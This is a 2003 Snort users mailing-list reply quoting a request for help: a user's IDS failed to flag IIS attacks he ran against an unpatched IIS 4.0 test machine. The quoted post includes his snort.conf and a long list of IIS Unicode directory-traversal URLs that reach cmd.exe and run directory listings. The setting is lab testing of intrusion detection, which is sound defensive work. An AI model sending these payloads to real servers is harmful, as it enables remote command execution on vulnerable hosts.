Snort mailing list archives
RE: Problem with web-iis rules
From: Alex Alborzfard <alex.alborzfard () identix com>
Date: Fri, 10 Oct 2003 12:29:07 -0400
What is the OS and snort version on your snort box? Which IIS attacks did you run? -----Original Message----- From: Yan Zhai [mailto:yzhai () unity ncsu edu] Sent: Friday, October 10, 2003 11:40 AM To: snort-users () lists sourceforge net Subject: [Snort-users] Problem with web-iis rules Hi there, I installed snort on my machine and launched a number of IIS attacks from my machine to another one in the LAN. The other machine is running an unpatched iis4.0 and the attacks are successful. Snort successfully reported the nmap portscans, however, it failed to report the iis attacks. It seems to me that snort just doesn't load up the web-iis rules. Below is my snort.conf, which is the default snort.conf with database output option. Can anyone point out what's the problem with it? Thanks. var HOME_NET any var EXTERNAL_NET any var DNS_SERVERS $HOME_NET var SMTP_SERVERS $HOME_NET var HTTP_SERVERS $HOME_NET var SQL_SERVERS $HOME_NET var TELNET_SERVERS $HOME_NET var HTTP_PORTS 80 var SHELLCODE_PORTS !80 var ORACLE_PORTS 1521 var AIM_SERVERS [64.12.24.0/24,64.12.25.0/24,64.12.26.14/24,64.12.28.0/24,64.12.29.0/24,64.1 2.161.0/24,64.12.163.0/24,205.188.5.0/24,205.188.9.0/24] var RULE_PATH ../rules preprocessor frag2 preprocessor rpc_decode: 111 32771 preprocessor bo output database: log, mssql, dbname=alerts user=snortuser password=**** include classification.config include reference.config include $RULE_PATH/bad-traffic.rules include $RULE_PATH/exploit.rules include $RULE_PATH/scan.rules include $RULE_PATH/finger.rules include $RULE_PATH/ftp.rules include $RULE_PATH/telnet.rules include $RULE_PATH/rpc.rules include $RULE_PATH/rservices.rules include $RULE_PATH/dos.rules include $RULE_PATH/ddos.rules include $RULE_PATH/dns.rules include $RULE_PATH/tftp.rules include $RULE_PATH/web-cgi.rules include $RULE_PATH/web-coldfusion.rules include $RULE_PATH/web-iis.rules include $RULE_PATH/web-frontpage.rules include $RULE_PATH/web-misc.rules include $RULE_PATH/web-client.rules include $RULE_PATH/web-php.rules include $RULE_PATH/sql.rules include $RULE_PATH/x11.rules include $RULE_PATH/icmp.rules include $RULE_PATH/netbios.rules include $RULE_PATH/misc.rules include $RULE_PATH/attack-responses.rules include $RULE_PATH/oracle.rules include $RULE_PATH/mysql.rules include $RULE_PATH/snmp.rules include $RULE_PATH/smtp.rules include $RULE_PATH/imap.rules include $RULE_PATH/pop2.rules include $RULE_PATH/pop3.rules include $RULE_PATH/nntp.rules include $RULE_PATH/other-ids.rules # include $RULE_PATH/web-attacks.rules # include $RULE_PATH/backdoor.rules # include $RULE_PATH/shellcode.rules # include $RULE_PATH/policy.rules # include $RULE_PATH/porn.rules # include $RULE_PATH/info.rules # include $RULE_PATH/icmp-info.rules # include $RULE_PATH/virus.rules # include $RULE_PATH/chat.rules # include $RULE_PATH/multimedia.rules # include $RULE_PATH/p2p.rules include $RULE_PATH/experimental.rules include $RULE_PATH/local.rules and here are the iis scripts I used: /_vti_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe /_vti_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c :\ /_vti_bin/..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\ /_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c :\ /_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\ /_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe /_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c :\ /_vti_bin/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\ /_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe /_vti_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c :\ /_vti_bin/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\ /cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe /cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe /cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe /cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe /msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe /msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir /msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\ /msadc/..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\ /msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\ /msadc/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\ /msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe /msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir /msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\ /msadc/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\ /msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe /msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir /msadc/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\ /msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd .exe\?/c\+dir /script/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\ /script/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\ /script/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\ /script/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\ /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir /scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe /scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c: \ /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\ /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir /scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe /scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c: \ /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\ /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir /scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe /scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c: \ /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\ /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir /scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir /scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c: \ /scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir /scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\ /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir -Yan
Current thread:
- Problem with web-iis rules Yan Zhai (Oct 10)
- Re: Problem with web-iis rules Matt Kettler (Oct 10)
- Re: Problem with web-iis rules Erek Adams (Oct 10)
- Re: Problem with web-iis rules Josh Berry (Oct 10)
- Re: Problem with web-iis rules Josh Berry (Oct 10)
- <Possible follow-ups>
- RE: Problem with web-iis rules snort-ml (Oct 10)
- RE: Problem with web-iis rules Yan Zhai (Oct 11)
- Re: Problem with web-iis rules Yan Zhai (Oct 11)
- RE: Problem with web-iis rules Alex Alborzfard (Oct 13)